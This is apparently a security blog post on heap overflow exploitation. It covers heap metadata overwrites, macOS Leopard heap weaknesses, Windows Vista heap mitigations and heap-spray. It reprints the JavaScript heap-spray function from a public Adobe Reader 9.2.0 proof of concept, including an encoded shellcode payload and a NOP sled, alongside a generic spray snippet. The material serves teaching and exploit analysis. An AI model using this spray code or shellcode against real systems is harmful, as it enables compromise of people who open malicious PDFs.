0x41 - weekly exploitation matters - Heap overflow fundamentals
Stack buffer overflows are extinct
Exploiting stack buffer overflows on modern operating systems is harder these days, because lots of mitigations are to overcome.
For example on Windows there's not only /GS - which is activated by default on Visual Studio nowadays - but also nx stack pages, ASLR, DEP and what not. This may lead to return-oriented attacks, but I personally think that even secure programming has improved in case of stack buffer overflows. So they're rare and relatively cumbersome to exploit, because they're understood and mitigated.
In general exploiting Heap overflows isn't easier, but it offers a different set of vulnerabilities. Heap overflows are less understood. The development of the arms-race between incorporated mitigations and new attacks varies depending on the targets. The low hanging fruits are MacOS Leopard systems. Exploiting Heap overflows on modern NT 6 (Vista/7) hosts can be a serious problem. Therefore I just analyzed a Windows XP SP III exploit against the Adobe Reader.
Metadata - Heap control structure overwrites
The Heap data-structure is a linked list. It has got two pointers: next and prev.
- struct HeapBlockHeader
- {
- HeapBlockHeader* next;
- HeapBlockHeader* prev;
- int size;
- // an oversimplified heap structure
- };
A buffer overflow situation can cause overwrites within the Heap structure. If the pattern is artful it can override the links within the Heap structure which leads to data flow alteration, because the heap manager follows the path of the list elements.
What follows is, that the return address on the stack gets overwritten with a pointer to code, that can for example lie within the pattern that was put into the original entry-point.
In the end it's simply about the pattern that fits to the attacked operating system: heap implementations differ.
MacOS Leopard Heap
On a MacOS 10.5.x system - currently - the Heap is executable. So it's actually not even necessary to perform a "return to libc" style attack. I recently read that Charlie found a couple of bugs in Preview.app and that he's going to release advises regarding vulnerability discovery techniques at CanSec.
Phrack 63 has an interesting paper regarding osX's heap implementation and overflow examples. I pretty much guess Charlie fuzzed Preview.app with a mutation based approach, crashed it as often as possible, and then created a pattern to perform an unlink() based attack. Let's await whether I'm correct or not with patience and Feng Shui.
The structure of Leopard's heap is well described in "The Machacker's Handbook" or in Phrack 63 by Nemo.
Why heap-spray?
Adobe products regularly get exploited with heap-spray due JavaScript support e. g.. Everybody who's creating malicious PDFs these days will try to predict the reader's heap-structure and therefore tame it to position it in a static way.
But that's not easy, because the heap is runtime dependent and the runtime behavior of an application will differ each time - even depending on which actions have been performed.
A heap-spray is for example if you use JavaScript to allocate large buffers and fill them with NOPs to slide into your shellcode. The more NOPs, the better - because that means there's less data you do not control and it'll lead to heap defragmentation.
There're some elegant modifications of this heap-spray attack which are fun.
- var slide_size=0x100000;
- var size = 300;
- var x = new Array(size);
- var chunk = %%minichunk%%;
- while (chunk.length <= slide_size/2)
- chunk += chunk;
- for (i=0; i < size; i+=1) {
- id = ""+i;
- x[i]= chunk.substring(4,slide_size/2-id.length-20)+id;
- }
If you for example take a look at "Filling Adobe's Heap" (note DB copy) you realize that the JS code snippet here does exactly that: it allocates large chunks in order to position the data.
The following JS code will construct a 0x100000 bytes long memory chunk made out of the concatenation of several %%minichunk%%. And then copy 300 times those 0x100000 bytes long chunk to 300 different newly allocated memory.
On Windows each heap base is X + 0x1F0000 at max; so it varies by round about 2 MB. Segment size is 16 MB. A larger chunk (doesn't get ASLRed) is >= 512 KB.
There's this rule of thumb "equation":
Last Page + (Spray amount / 2) = position of data.
Analysis of an Windows XP SP III Heap exploit
If you checked out exploit-db's SVN some time ago, you got a local Adobe Reader 9.2.0 PoC (EDB-ID: 10618, CVE) exploit.
It's written in Python, using interesting functions if you want to trigger vulnerabilities with a JS enabled Adobe Reader: for example UTF 16 conversion of the payload, raw pdf generation and adding JS. The approach is clean and modular, therefore I added this exploit to my snippet repository.
Again we see a JS function that sprays the heap:
- << /Type /Action /S /JavaScript /JS (
- function spray_heap()
- {
- var chunk_size, payload, nopsled;
- chunk_size = 0x8000;
- payload = unescape("%uc931%ue983%ud9dd%ud9ee
- %u2474%u5bf4%u7381%u6f13%ub102%u830e%ufceb
- %uf4e2%uea93%u0ef5%u026
- f%u4b3a%u8953%u0bcd%u0317%u855e%u1a20%u513a%u034f%u475a
- %u36e4%u0f3a%u3381%u9771%u86c3%u7a71%uc368%u037b%uc06e%ufa5a
- %u5654
- %u0a95%ue71a%u513a%u034b%u685a%u0ee4%u85fa
- %u1e30%ue5b0%u1ee4%u0f3a%u8b84%u2aed%uc16b%uce80%u890b
- %u3ef1%uc2ea%u02c9%u42e4%
- u85bd%u1e1f%u851c%u0a07%u075a%u82e4%u0e01%u026f%u663a
- %u5d53%uf880%u540f%uf638%uc2ec%u5eca%u7c07%uec69%u6a1c
- %uf029%u0ce5%u
- f1e6%u6188%u62d0%u2c0c%u76d4%u020a%u0eb1");
- nopsled = unescape("%u0d0d%u0d0d");
- while (nopsled.length < chunk_size)
- nopsled += nopsled;
- nopsled_len = chunk_size - (payload.length + 20);
- nopsled = nopsled.substring(0, nopsled_len);
- heap_chunks = new Array();
- for (var i = 0 ; i < 1200 ; i++)
- heap_chunks[i] = nopsled + payload;
- }
After the heap is filled with 0x8000 NOPs the string until nopsled_len is extracted as nopsled. nopsled is used within the heap_chunks[].
So again there's a huge (1200 * nopsled+payload) data-structure that got generated to tame the heap with Feng Shui[1] to predict it.
The rest of the exploit is bug triggering. That will differ for each bug you may want to go after.
References
[1] Heap Feng Shui in JavaScript - Alexander Sotirov - BH Europe 2007 - note DB
What's with the Vista Heap?
The attacks mentioned so far - speaking of the heap-spray and the referenced unlink() attack, are relatively outdated. Not primitive, but not as application specific as necessary. There are some newer techniques [3] against new mitigations, which are most notably [2]:
- LFH and regular heap block randomization
- "Block CRC" checksum as part of the HEAP_ENTRY - each chunk from the standard heap has got an 8 bytes header before the pointer consisting of size, flags, checksum and so on
- the HeapEnableTerminationOnCorruption class from the HeapSetInformation API - optional termination in case of inconsistencies due corruptions
- "on demand" low fragmentation heap, that changes the allocation pattern
- list integrity checks - so no list removal based attacks
If you use WinDBG at your target application you can retrieve the Metadata with the !heap -i heap_handle.
An application specific attack overwrites structures of the heap, that are important to the application in order to manipulate its behavior. Therefore it requires control over the target application's allocation pattern.
I managed to get something like that recently: a large chunk allocation via RtlAllocateHeap() (not ASLRed therefore), but I'll reserve hHeap overflow specifics and guard pages for a following write-up in two weeks or later and until then try to find an exploitable target application to demonstrate that sufficiently.
I think it's challenging.
References
[2] Windows Vista heap management enhancements - Adrian Marinescu (MS) - BH 2006
[3] Attacking the Vista Heap - Ben Hawkes - ruxcon 2008 - note DB, BH USA video (local mirror)
Summary
- just Feng Shui and heap-spray - fundamentals for hHeap overflows
- inspiration to go after application specific heap exploitation techniques
- not too much blabla
What's up next week: Windows shellcode
Normally you take shellcode for granted?
- That's okay, everybody does that. But how do you validate shellcode within exploits? It may be a fake exploit that deletes your local files. Worse things have been seen.
Next week: shellcode analysis and reversing, shellcode basics, shellcode frameworks, Windows shellcode.
Feedback
Mail to wishi - at - sandokai.eu.
Have fun,
wishi

Post new comment